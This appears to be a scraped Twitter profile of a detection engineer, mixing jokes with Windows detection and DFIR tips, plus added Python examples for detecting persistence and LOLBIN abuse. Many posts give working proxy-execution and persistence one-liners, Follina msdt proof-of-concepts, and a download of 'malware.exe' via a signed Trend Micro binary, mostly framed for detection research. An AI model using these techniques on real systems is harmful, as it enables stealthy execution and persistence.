Nasreddine Bencherchali (@nas_bench)
Followers 10,011 | Following 1,224 | Media 1,249 | Statuses 7,383

Detection @nextronsystems | @sigma_hq & LOLDrivers maintainer | Avid learner and passionate about all things #Detection #Sigma

HAL
Joined August 2011
@nas_bench (1 month ago)
💀 (image)
@nas_bench (1 month ago)
Honest threat actors be like 👀 (image)
@nas_bench (2 years ago)
CVE-2021-44832 (image)
@nas_bench (2 years ago)
Since everyone patches systems based on what infosec Twitter is currently hyping, we should do a weekly hype for old vulnerabilities and pretend that they are new. Then maybe people will care.
@nas_bench (3 years ago)
"Svchost.exe" Mind Map covering its cmdline options, logs and "normal" behavior. Link: #Detection #BlueTeam #Windows (image)
@nas_bench (2 years ago)
Here is a stupid way to persist on a machine using WindowsTerminal profiles.
1. Modify the "settings.json" located in %localappdata% and add a custom profile that contains your payload.
2. Change the "defaultProfile" value and put your GUID.
3. Add the value "startOnUserLogin": true.
(images)
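As an added example (not the author's code), here is a small offline audit of a Windows Terminal settings.json for the persistence chain above: it resolves the defaultProfile GUID, checks whether startOnUserLogin is set, and flags any autostarting profile whose commandline image is not one of the shells you expect. The settings document is constructed, and the set of "expected" shell images is an assumption you would tune to your environment.

```python
"""Audit a Windows Terminal settings.json for start-on-login persistence.

Added example, not code from the original page. SAMPLE_SETTINGS is constructed;
EXPECTED_IMAGES is an assumption to tune per environment.
"""
import json

# Images that Windows Terminal profiles are normally expected to launch (assumption).
EXPECTED_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "wsl.exe"}


def image_name(commandline: str) -> str:
    """Lower-cased executable file name from a profile commandline, handling quoting."""
    cmd = commandline.strip()
    if not cmd:
        return ""
    exe = cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split(None, 1)[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def profile_list(settings: dict) -> list:
    """settings.json stores profiles either as a bare list or as {"list": [...]}."""
    profiles = settings.get("profiles", [])
    if isinstance(profiles, dict):
        profiles = profiles.get("list", [])
    return profiles


def audit_settings(settings_text: str) -> list:
    """Return (severity, profile name, reason) tuples for suspicious profiles."""
    settings = json.loads(settings_text)
    profiles = profile_list(settings)
    default_guid = settings.get("defaultProfile")
    start_on_login = bool(settings.get("startOnUserLogin", False))  # global setting
    findings = []
    for p in profiles:
        cmd = p.get("commandline", "")
        exe = image_name(cmd)
        is_default = p.get("guid") == default_guid
        # A per-profile startOnUserLogin key is not standard; checked anyway (assumption).
        autostarts = (is_default and start_on_login) or bool(p.get("startOnUserLogin", False))
        unexpected = bool(cmd) and exe not in EXPECTED_IMAGES
        if unexpected and autostarts:
            findings.append(("high", p.get("name"), f"autostart profile runs {exe}: {cmd}"))
        elif unexpected:
            findings.append(("low", p.get("name"), f"profile runs non-shell image {exe}: {cmd}"))
        if is_default and p.get("hidden"):
            findings.append(("medium", p.get("name"), "default profile is hidden from the UI"))
    if start_on_login and not any(p.get("guid") == default_guid for p in profiles):
        findings.append(("medium", None, "startOnUserLogin set but defaultProfile matches no profile"))
    return findings


# Constructed sample: the third profile impersonates the PowerShell profile name
# (trailing space), is hidden, is the default, and the terminal autostarts at logon.
SAMPLE_SETTINGS = r'''
{
  "defaultProfile": "{e45bd3bd-0000-4d49-8f3e-6e1b7f3a1c11}",
  "startOnUserLogin": true,
  "profiles": {
    "list": [
      {"guid": "{61c54bbd-c2c6-5271-96e7-009a87ff44bf}", "name": "Windows PowerShell", "commandline": "powershell.exe"},
      {"guid": "{0caa0dad-35be-5f56-a8ff-afceeeaa6101}", "name": "Command Prompt", "commandline": "%SystemRoot%\\System32\\cmd.exe"},
      {"guid": "{e45bd3bd-0000-4d49-8f3e-6e1b7f3a1c11}", "name": "Windows PowerShell ", "hidden": true,
       "commandline": "\"C:\\Users\\Public\\update.exe\" -q"}
    ]
  }
}
'''


def main():
    for severity, name, reason in audit_settings(SAMPLE_SETTINGS):
        print(f"[{severity}] {name!r}: {reason}")


if __name__ == "__main__":
    main()
```

On a live host, feed the function the contents of %localappdata%\Packages\Microsoft.WindowsTerminal_8wekyb3d8bbwe\LocalState\settings.json (path assumed, not taken from the tweet) and pair the result with a file-modification watch on that file.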
@nas_bench (3 years ago)
If you have Symantec SEP installed you can use the "Symantec.SSHelper" COM object to launch processes and download arbitrary files. The "User-Agent: Symantec Agent" can be used to identify requests made by the "HIDownloadURLFile" (images)
@nas_bench (2 years ago)
In addition to the documented "-e/--exec" flag in #lolbas about the "wsl.exe" binary (). We can also use the "--system" flag to run Linux (as root) /Windows commands. wsl --system [Command] (image)
@nas_bench (6 months ago)
A quick DFIR tip for the weekend. Now that Notepad on Win 11 saves its state and can open tabs, it means history is saved somewhere :) Well, that somewhere is in %localappdata%\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState\TabState. A new location to monitor and…
@nas_bench (3 years ago)
Windows Services (Creation) Mind Map covering service creation and detection methods. Link: #Detection #BlueTeam #Windows #Services (image)
@nas_bench (3 years ago)
By creating the key "telnet.exe" in the "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths" registry and setting the "Default" key to any executable. We can call it by running the command: rundll32.exe url.dll,TelnetProtocolHandler (images)
@nas_bench (2 years ago)
We need blue team people to start writing malware that can move laterally and persist and all that good shit but the payload is to enable PowerShell logging and install Sysmon 😂
@nas_bench (2 years ago)
If you have a #Symantec Endpoint Protection Manager (SEPM) instance installed, you can use the signed "WinExec" binary to launch arbitrary commands. WinExec.exe "[InsertCommand]" It'll execute the command(s) in question using "cmd.exe /c [Command]" #lolbin (image)
@nas_bench (8 months ago)
The calc button on the keyboard, also known as the ultimate POC button. Necessary for any live demo "Just in case" (image)
@nas_bench (3 years ago)
In this blog post, I take a look at some of the lesser known #Windows Event Log files and try to find interesting artifacts for #DFIR and #ThreatHunting Thanks for reading. Feedback is really appreciated.
@nas_bench (1 year ago)
PowerShell has a list of suspicious keywords. If found in a script block an automatic 4104 event will be generated regardless of logging policy :) (True for both PWSH 5/7) Look for EID 4104 with Level 3 (Warning) Full List: (images)
@nas_bench (2 years ago)
I created a new project called C2-Matrix-Indicators that aims to take a code review approach to extract detections/indicators out of the C2's listed in the @c2_matrix Feedback and contributions are highly appreciated. LINK: #BlueTeam #detection #infosec (images)
@nas_bench (1 year ago)
@vxunderground The source code for cancer will finally be "free" to analyze.
@nas_bench (8 months ago)
(image)
@nas_bench (3 years ago)
[Blog📚] A Primer On Event Tracing For Windows (ETW) In this blog I cover the following topics - Introduction to ETW - Provider Manifest Structure - Tools and Techniques to Interact With ETW #infosec #blueteam #windows
@nas_bench (4 months ago)
One thing I dislike about Windows file "properties" is that it chooses to hide or show some information depending on the extension of the file. For example a ".cpl" has an original filename field but if you inspect it, it won't show it. Change the extension to ".dll" and it's now… (image)
@nas_bench (2 years ago)
msdt #follina run from CLI directly doesn't require the "IT_RebrowseForFile" nor "ms-msdt". See minimal POC below msdt /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
@nas_bench (3 years ago)
Real life infosec reminder : - Most companies don't have detection teams. At best AV with old sig. - Servers are not updated every month. Most still have Win7 and 2008 - Most stuff is left in default config state. - If they have 💰. Then, buy leader in Gartner and leave it as is.
@nas_bench (2 years ago)
#log4j thread Detection Ideas + Yara by @cyb3rops - Hashes for vulnerable LOG4J versions by @mubix - SIGMA by @SOC_Prime - Payloads list by @GreyNoiseIO -
@nas_bench (8 months ago)
Billion $$$ industry Vs person with some free time 😂 (image)
@nas_bench (6 months ago)
Just msedgewebview2 casually executing "cmd.exe /S /C \"\"chcp\" 437>nul 2>&1 & \"C:\\WINDOWS\\System32\\whoami.exe\" /groups\"" (image)
@nas_bench (3 years ago)
First blog of 2021 Common Tools & Techniques Used By Threat Actors and Malware — Part I If you're starting as a threat hunter or a detection engineer give this a read. Feedback is appreciated. #threathunting #BlueTeam #detection #engineering
@nas_bench (1 year ago)
To get people into blue teaming. We need a series similar to Mr. Robot but the main character is a blue teamer/EDR admin. Deploying GPOs and answering support tickets and tuning FP. Make that exciting Netflix😅
@nas_bench (2 years ago)
Look mom I've made it to a SANS poster 🥳 Thank you 🙏 (image)
> Quoting @SANSEMEA (SANS Institute, EMEA, 2 years ago): #Windows Third-Party #AppsForensics Reference Guide provides a detailed exploration of artifacts from 46 third-party applications commonly found on devices running the Windows operating system. Download: Download in Portuguese: (image)
@nas_bench (2 months ago)
As a detection engineer writing detections for a product. You'll face the reality that you need to write the same detection using multiple sources - Security Log - Sysmon - PowerShell Scriptblock (if its powershell related) - Kernel / EDR source - ETW counterpart Kernel-Process…
@nas_bench (3 years ago)
Created a new repository that contains resources (blogs, slides, talks...) to learn and understand SIGMA Rules. If you have any related resources please feel free to contribute. #sigma #detection #infosec #resources
@nas_bench (2 years ago)
Glad we're safe for now. #log4shell (image)
@nas_bench (2 years ago)
MAL-CL has now coverage for more than 40+ different tools. Every tool has ➡️MITRE Mapping. ➡️Detections (Splunk, Sigma, Elastic, Azure) when possible. ➡️Common Command-lines ➡️Sandbox Execution & Event logs to monitor And much more to come. Github: (image)
@nas_bench (2 months ago)
Average threat actor or admin batch script 😭 (image)
@nas_bench (2 years ago)
Use "wt.exe" or "WindowsTerminal.exe" as a #lolbin to proxy execution wt.exe [command] WindowsTerminal.exe [command] (image)
@nas_bench (4 months ago)
Here is a quick write-up for one of the most convoluted LOLBINs to setup. StandaloneRunner.exe is a utility included with the Windows Driver Kit (WDK) used for testing and debugging drivers on Windows systems. It calls to a function named "RunCommand" that directly allows the… (images)
@nas_bench (3 years ago)
[New Blog] I just published "Symantec Endpoint Protection Meets COM — Using “Symantec.SSHelper” As A LOLBIN" detailing how I found the Symantec.SSHelper #lolbin and the many features it offers. Feedback is appreciated as always 🙏
@nas_bench (2 months ago)
I'm here to remind you that the most underrated and slept on C2 is actually Merlin. Been there for a long time and still have a very low detection rate across the board. You all be underestimating the power of low detections with go based stuff. (image)
> Quoting @techspence (spencer, 2 months ago): (image)
@nas_bench (8 months ago)
HERE WE GO AGAIN 😩 (image)
> Quoting @nas_bench (8 months ago): (image)
@nas_bench (1 year ago)
Everyone gets a LOLBIN in this new blog post about some cool binaries I found that can be abused from AV uninstallers and their tooling. 📚 #lolbins #lolbas #windows #blueteam
@nas_bench (2 months ago)
I feel many people should actually work in the front line of defense. With broken SIEMs, unmanaged and underpaid teams, missing logs, broken workflows...etc. Many, and I mean many talk from their Ivory tower 6/7 figure job with the best, and taking one continent they live in or…
@nas_bench (4 years ago)
A Deep Dive Into ‘DLLHOST.EXE’ - What is the ‘DLLHOST.EXE’ Process Actually Running #Malware #ThreatHunting #Windows #Internals
@nas_bench (4 months ago)
As we all know, true APTs and TAs avoid using "whoami" as its a sign of weakness. So here is a thread of 14 examples of APTs and TAs executing it over the years. MosesStaff By Checkpoint 1/🧵 (image)
@nas_bench (2 years ago)
The "PCW.debugreport.xml" file inside %localappdata%\Diagnostics and %localappdata%\ElevatedDiagnostics (for elevated instances) is generated when executing the #follina thingy and it contains the payload. Maybe good for #dfir Did anyone look into this? (image)
@nas_bench (2 years ago)
Using the "Pcwrun" binary we can also trigger #follina as this will be equivalent to running #msdt with an answer file (See Image). "Pcwrun /../../$(calc).exe" Will spawn "msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af %temp%\PCWXXXX.xml /skip TRUE" #lolbin (images)
@nas_bench (2 years ago)
We know from LOLBAS that adplus can be used to dump lsass (). But you can also use it to run arbitrary commands and binaries with the "-sc" flag. #lolbin #lolbas adplus.exe -crash -o [OutputDir] -sc [Command]
@nas_bench (3 years ago)
[New Blog] I just published Symantec EDR Internals — Criterion This is the first blog in a series where I'll dive into the internals of the detection technologies and mechanisms used by @symantec #EDR Feedback is really appreciated.
@nas_bench (3 years ago)
MindMap I made a while back covering some of the common Windows system processes, their parent/child relationship and default behavior. Link: #Detection #BlueTeam (image)
@nas_bench (3 years ago)
#MalwareAnalysisTip If you see the "/e:VBScript.Encode" flag in a command line. This "indicates" that the file is an encoded VBS You can use the following tools to decode it : 1) 2) Examples: (image)
@nas_bench (2 years ago)
I'm really excited and delighted to share that I have joined @nextronsystems as Threat Researcher. Super stoked to work with @cyb3rops and the team and provide more blueness to the world 💙😁
@nas_bench (6 months ago)
🧙‍♂️Introducing SigmaHQ GUI 🧙‍♂️ This tool was built specifically to easily create and update Sigma Security Content. Get started now and start exploring and creating rules -> Read more about the tool in this release blog -> ⚒️… (images)
@nas_bench (4 months ago)
Took some time to put the discussion from the thread below into a more coherent and digestible format. TL;DR - If you're interested how UWP and Windows desktop apps (store and other) are able to start on startup of windows without touching the Run key or any typical persistence… (images)
> Quoting @nas_bench (4 months ago): @James_inthe_box @Hexacorn @joshlemon Small update :) While the tangent we went on was good, I think I found the real culprit. WindowsApps (Appx) have a special key to create startup tasks. Its in "HKEY_CURRENT_USER\Software\Classes\Local… (images)
@nas_bench (5 months ago)
Did you know that when you disable "Real-time protection" on defender, its true that you won't receive events on the Defender Event log anymore (related to that feature). But if you actually subscribe to the AMSI ETW {2A576B87-09A7-520E-C21A-4942F0271D67} provider you'd still… (images)
@nas_bench (2 years ago)
You can use the "Microsoft-Windows-Services-Svchost" #ETW provider to spot fake "svchost" processes as this provider will only track services started via the legitimate svchost. If it's not showing up then it's worth looking into. #threathunting #dfir (image)
@nas_bench (3 years ago)
Following @SwiftOnSecurity amazing thread (). I’ve compiled some of the tools mentioned in it with their corresponding links in the thread below (For reference and easy find).
> Quoting @SwiftOnSecurity (SwiftOnSecurity, 4 years ago): What are some good utilities/tools that you don't think other people know about? They can be commercial.
@nas_bench (4 months ago)
CS leader and MS a close second (image)
@nas_bench (2 years ago)
EDRs/AVs sometimes trust certain locations or perform certain behavior when met with unexpected weirdness. Here are some ideas to check/test for, the next time you have some alone time with your solution 1/🧵
@nas_bench (2 years ago)
I love it when threat actors are old-school users of Windows. Instead of traditional methods to enumerate local groups on a machine, the TA used the "local.exe" utility that's part of the "Windows 2000 Resource Kit Tools". (image)
@nas_bench (3 months ago)
It's physically impossible to keep up with the research being released nowadays. Basically life becomes a mix of FOMO, Imposter Syndrome and eventual burnout😭 What's the solution you might ask? Welp it turns out, no one is actually keeping up with everything. 😂Everyone is…
@nas_bench (6 months ago)
[COMING SOON] Atomic Red Team 🐦 Integration is coming to SigmaHQ 🧙‍♂️ Sigma rules will be validated regularly against atomics directly in the Sigma CI pipelines to ensure even more quality. Will share more in time 🔥 (image)
@nas_bench (1 year ago)
If you use PowerShell 7. Know that logging is not in the usual "Microsoft-Windows-PowerShell/Operational" but instead in "PowerShellCore/Operational". That you need to enable. Use "RegisterManifest.ps1" and "InstallPSCorePolicyDefinitions.ps1" to get it (images)
@nas_bench (3 years ago)
[Blog📚] Finding Detection and Forensic Goodness In ETW Providers In this blog I take a look at some of the telemetry provided by the different ETW providers that can be used for detection/forensic investigations. #BlueTeam #ETW #Windows #dfir
@nas_bench (4 months ago)
Finally a REAL APT not that Kaspersky weird stuff 😂 (images)
@nas_bench (6 months ago)
I think it's high time we stopped fucking around and pretending security is working. We've been getting high severity vulnerabilities every couple of days for the last 6-7 months it's not even funny anymore. No amount of 100% coverage will save you. So let's get a grip and stop…
@nas_bench (2 years ago)
In my stupid quest to find #lolbin 's in any software, here is one that's part of the "Advanced Installer" software that conveniently has the description "File that launches another file" viewer.exe /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "Command" [Args] It's also signed. (images)
@nas_bench (1 year ago)
Persistence via Event Viewer help link😅using "\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer\" Add "MicrosoftRedirectionProgram" with your program and set "ConfirmUrl" to 1 to avoid the prompt (images)
@nas_bench (3 years ago)
[New Blog] Understanding & Detecting C2 Frameworks — BabyShark 🦈 by @UnkL4b - Server written in Python / Flask. - Uses Google Translator as a proxy to send commands. @c2_matrix #blue_team #redteam #C2Matrix
@nas_bench (3 months ago)
It's a balancing act 😂 (image)
@nas_bench (2 years ago)
Here is another signed #lolbin to proxy your execution through available with fresh VStudio installation. (C:\Program Files (x86)\Microsoft Visual Studio\20XX\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\osXX\) #lolbas OpenConsole.exe <Payload> (image)
@nas_bench (2 years ago)
If you're not reading @DebugPrivilege blog. You're literally missing out on a ton of amazing information.
@nas_bench (1 year ago)
I love how when someone shares an offensive tool he gets praised. But when a blue teamer shares a detection he's told that it's bypassable/weak. 🤫
@nas_bench (2 years ago)
Here is a nice #lolbas #LOLScript part of VStudio install (Launch-VsDevShell). Has an IEX call that accepts passed args via "-VsWherePath" and "-VsInstallationPath" flags. 🧵1/3 .\Launch-VsDevShell.ps1 -VsWherePath 'C:\Windows\System32\calc.exe' #lolbin (images)
@nas_bench (1 year ago)
If you're doing #dfir on a machine that has a WSL distro installed. Don't forget to check the "ext4.vhdx" for any suspicious activity initiated from there. Even on a live system you can open the file using 7Zip for example and check the ".bash_history" among other things :) #detection (image)
@nas_bench (3 years ago)
Honest question. If your C2 "bypasses" all EDR's. What's the recommendation in your red team report?
@nas_bench (2 years ago)
#follina is patched but did you know you could use a .diagcab file with an embedded answer file. Then the only required flag becomes "/cab" (and one-click as I couldn't find how to skip the UI...🥲) #lolbin msdt /cab PCWDiagnostic.diagcab
@nas_bench (3 years ago)
[New Blog] Understanding & Detecting C2 Frameworks — DarkFinger-C2 by @hyp3rlinx - Server written in Python. - Agent written in Batch. - Uses "Finger.exe" utility as a C2 channel. @c2_matrix #BlueTeam #redteam #C2Matrix
@nas_bench (1 year ago)
One of the best things to invest in if you're building detections is to baseline server/service child processes. More often than not, all entry vectors (RCE, Phish...etc) will spawn a "suspicious" child process. From "java" and "tomcat" to "winword" and "svchost" 🧵
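The baselining approach in the post above, as an added example (not the author's code): learn which child images each watched parent spawned during a clean period, then flag any child a watched parent spawns outside that set. The events are constructed in a Sysmon EID 1 (process creation) like shape, and the list of watched parents is taken from the post's examples; both are assumptions to replace with your own telemetry.

```python
"""Baseline parent -> child process pairs, then flag out-of-baseline children.

Added example, not code from the original page. BASELINE_EVENTS and NEW_EVENTS
are constructed; WATCHED_PARENTS mirrors the parents named in the post.
"""
from collections import Counter, defaultdict

# Server/service/Office parents whose children are worth baselining (assumption).
WATCHED_PARENTS = {"java.exe", "tomcat9.exe", "winword.exe", "svchost.exe"}


def image_name(path: str) -> str:
    """Lower-cased file name of an image path (backslash or forward slash)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_baseline(events, min_count: int = 1) -> dict:
    """Return {parent: {child, ...}} from events seen during a known-good window.

    Raising min_count drops pairs seen only once, which are often noise even in
    a clean baseline and would otherwise be whitelisted forever.
    """
    pairs = Counter(
        (image_name(ev["ParentImage"]), image_name(ev["Image"])) for ev in events
    )
    baseline = defaultdict(set)
    for (parent, child), n in pairs.items():
        if n >= min_count:
            baseline[parent].add(child)
    return dict(baseline)


def find_anomalies(events, baseline: dict, watched=WATCHED_PARENTS) -> list:
    """Return (parent, child, commandline) for watched parents spawning an unseen child.

    Unwatched parents are ignored on purpose: a browser spawning cmd.exe may be
    interesting, but it is not what this baseline is built to answer.
    """
    hits = []
    for ev in events:
        parent = image_name(ev["ParentImage"])
        child = image_name(ev["Image"])
        if parent in watched and child not in baseline.get(parent, set()):
            hits.append((parent, child, ev["CommandLine"]))
    return hits


# Constructed "clean period" telemetry (not real data).
BASELINE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": r"C:\Windows\System32\rundll32.exe", "CommandLine": "rundll32.exe ..."},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": r"C:\Windows\System32\rundll32.exe", "CommandLine": "rundll32.exe ..."},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": r"C:\Windows\System32\conhost.exe", "CommandLine": "conhost.exe 0xffffffff"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
    {"ParentImage": r"C:\Program Files\Java\jre\bin\java.exe", "Image": r"C:\Windows\System32\conhost.exe", "CommandLine": "conhost.exe 0xffffffff"},
]

# Constructed events from the period under investigation.
NEW_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA..."},
    {"ParentImage": r"C:\Program Files\Java\jre\bin\java.exe", "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": r"C:\Windows\System32\rundll32.exe", "CommandLine": "rundll32.exe ..."},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
]


def main():
    baseline = build_baseline(BASELINE_EVENTS)
    for parent, child, cmdline in find_anomalies(NEW_EVENTS, baseline):
        print(f"{parent} -> {child}: {cmdline}")


if __name__ == "__main__":
    main()
```

The win here is that the rule never needs to know what powershell.exe or cmd.exe look like when malicious; it only needs to know that winword.exe and java.exe did not spawn them during the baseline window.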
@nas_bench (9 months ago)
[Blog 📚] LOLBINed - Abusing Sysinternals BgInfo An additional abuse vector, for a #LOLBIN first discovered by @Oddvarmoe #lolbas
@nas_bench (2 years ago)
You can execute arbitrary Lua Scripts using @FSecure signed "Products Uninstallation Tool"(FsUninstallationTool.exe) FsUninstallationTool.exe -s -p mdr --scripts [ScriptFolderLocation] *Require "Administrator" to launch #lolbin #fsecure (image)
@nas_bench (8 months ago)
Shocker news but if you're building detections don't focus on the new and shiny as it probably won't affect you. Instead prioritize building the fundamentals of detection such as renamed sys binaries, susp child processes, exec from susp locations, etc. These will help you forever (image)
@nas_bench (1 year ago)
Let's break down some easy [host-based] wins from the SNAKE report with some SIGMA detections. #snakemalware 1- Persistence via Service [T1543.003] + Service Execution (images)
> Quoting @nas_bench (1 year ago): I got a Work In Progress PR @sigma_hq based on this report. Targeting IOCs and different ideas mentioned here and there. Follow this stream for a list of rules to hunt for this :)
@nas_bench (3 years ago)
[New Blog] Understanding & Detecting C2 Frameworks — Ares In this new series. I'll be diving into and exploring different C2 frameworks. To offer some understanding and detection opportunities for out of the box usage and configurations.
@nas_bench (6 months ago)
The @TheDFIRReport is one of the best thing that happened to this industry. Providing extremely detailed reports with an extreme level of detail for every step. Showcasing what happens in the every day attacks that millions of people face. The best part is that it keeps on…
@nas_bench (2 years ago)
I wonder how many detections, malware, and software would break if it's just "D:\" instead of "C:\"
@nas_bench (6 months ago)
News flash! Your built in EDR rules aren't enough and worst of all you can't even update or understand what they detect. Some might say. I use a validation method so I know what they're detecting. You're only confirming a subset of certain implementations of TTPs. So check again.…
@nas_bench (2 years ago)
I've been playing with the "Microsoft-Windows-Search-Core" ETW provider and I found some interesting stuff regarding the "search-ms" thingy. So full queries are logged in EID 51. Exp running "search-ms:query=" from the Windows "Run" you get the following event. 🧵1/4 (image)
@nas_bench (11 months ago)
2 kinds of threats. (image)
@nas_bench (2 years ago)
This is a thread compiling different threads, blogs, and help offered by the infosec community related to the current situation. If you have additional links put them here. 🧵
@nas_bench (2 years ago)
[Blog 🪡] In this new blog series I'm calling "Behind The Detection", I'll be sharing some tips and ideas on building detections using SIGMA. In this introductory post, I take a look at some schtasks examples and give a taste of what's to come. #blueteam
@nas_bench (11 months ago)
TisEzIns a binary bundled with Trend Micro installer that "Helps download the Trend Micro software installer" can be abused to download arbitrary files. #lolbin TisEzIns.exe /b /u " http://IP/malware.exe" /f "C:\path\to\save\malware.exe" Read More: (images)
@nas_bench (4 months ago)
@SwiftOnSecurity Publish a linux distro
@nas_bench (5 months ago)
Excuse me what! (image)
@nas_bench (1 year ago)
I love how APTs use the latest and greatest zero days and bypasses for entry and persistence. And then you have rundll32 executing files from Windows\Temp with a .txt extension 😅 got bored in the middle of the operation.
@nas_bench (2 years ago)
Added some new #sigma rules based on the latest @TheDFIRReport related to MSSQL and other goodness. Check out the sigma repo for the full list (images)
> Quoting @TheDFIRReport (The DFIR Report, 2 years ago): SELECT XMRig FROM SQLServer ➡️Initial Access: Brute Force ➡️Execution: xp_cmdshell, batch scripts, certutil ➡️Persistence: Hidden accounts, schtasks, WMI event subscription via mof files ➡️Defense Evasion: Kill AVs, Disabling UAC ➡️Impact: XMRig Miner (images)
@nas_bench (2 years ago)
[Blog] LOLBINed — Using Kaspersky Endpoint Security ‘KES’ Installer to Execute Arbitrary Commands An interesting set of issues I found at the start of the year in the KES installer and related products. Enjoy 😁
@nas_bench (2 years ago)
Another #lolbin using the GUP.exe binary from Notepad++ that allows us to execute arbitrary executables :) #lolbas GUP.exe -unzipTo "[Payload]" "" ""
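Several posts on this page hand a detection engineer a concrete string to look for: rundll32 url.dll,TelnetProtocolHandler and the App Paths telnet.exe key, wsl --system, adplus -sc, the msdt IT_BrowseForFile traversal, the Event Viewer MicrosoftRedirectionProgram value, and GUP.exe -unzipTo above. As an added example (not the author's Sigma rules, which are not reproduced here), the block below encodes those as minimal rules over Sysmon-shaped process-creation (EID 1) and registry value set (EID 13) events and runs them against constructed sample events. The rule shapes, field names and thresholds are mine; every rule needs tuning against your own baseline (adplus -sc, for instance, has legitimate debugging uses).

```python
"""Minimal rule matcher for LOLBIN command lines and persistence registry paths.

Added example, not code or rules from the original page. SAMPLE_EVENTS are
constructed; rule strings come from the posts above, rule logic is mine.
"""

# Each rule: event_id (Sysmon 1 = process create, 13 = registry value set),
# optional image file name, and case-insensitive substrings that must all match.
RULES = [
    {"title": "App Paths telnet.exe handler via rundll32 url.dll", "event_id": 1,
     "image": "rundll32.exe", "contains": ["url.dll", "telnetprotocolhandler"]},
    {"title": "WSL --system execution", "event_id": 1,
     "image": "wsl.exe", "contains": ["--system"]},
    {"title": "adplus.exe -sc command execution (tune: legitimate debugging use)", "event_id": 1,
     "image": "adplus.exe", "contains": ["-sc"]},
    {"title": "msdt.exe IT_BrowseForFile path traversal", "event_id": 1,
     "image": "msdt.exe", "contains": ["it_browseforfile", "/../"]},
    {"title": "Pcwrun.exe path traversal argument", "event_id": 1,
     "image": "pcwrun.exe", "contains": ["/../"]},
    {"title": "Notepad++ GUP.exe -unzipTo proxy execution", "event_id": 1,
     "image": "gup.exe", "contains": ["-unzipto"]},
    {"title": "App Paths telnet.exe registry key set", "event_id": 13,
     "contains": ["\\app paths\\telnet.exe"]},
    {"title": "Event Viewer MicrosoftRedirectionProgram set", "event_id": 13,
     "contains": ["\\event viewer\\microsoftredirectionprogram"]},
]

# Which event field carries the text the rule's substrings are matched against.
FIELD_FOR_EVENT = {1: "CommandLine", 13: "TargetObject"}


def image_name(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_matches(rule: dict, ev: dict) -> bool:
    """True when the event type, image (if constrained) and all substrings match."""
    if ev.get("EventID") != rule["event_id"]:
        return False
    if "image" in rule and image_name(ev.get("Image", "")) != rule["image"]:
        return False
    haystack = ev.get(FIELD_FOR_EVENT[rule["event_id"]], "").lower()
    return all(needle in haystack for needle in rule["contains"])


def evaluate(events, rules=RULES) -> list:
    """Return (event index, rule title) for every rule hit."""
    return [(i, r["title"]) for i, ev in enumerate(events) for r in rules if rule_matches(r, ev)]


# Constructed sample events; index 5 is the benign control.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe url.dll,TelnetProtocolHandler"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wsl.exe",
     "CommandLine": "wsl --system id"},
    {"EventID": 1, "Image": r"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe",
     "CommandLine": 'adplus.exe -crash -o C:\\dumps -sc "calc.exe"'},
    {"EventID": 1, "Image": r"C:\Windows\System32\msdt.exe",
     "CommandLine": 'msdt /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"'},
    {"EventID": 1, "Image": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "CommandLine": 'GUP.exe -unzipTo "C:\\Users\\Public\\payload.exe" "" ""'},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\telnet.exe\(Default)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer\MicrosoftRedirectionProgram"},
]


def main():
    for index, title in evaluate(SAMPLE_EVENTS):
        print(f"event {index}: {title}")


if __name__ == "__main__":
    main()
```

The image constraint matters as much as the substring: the post on renamed system binaries makes the point that attackers rename things, so in production you would match on OriginalFileName as well as Image, and pair the process rules with a renamed-binary rule rather than relying on the file name alone.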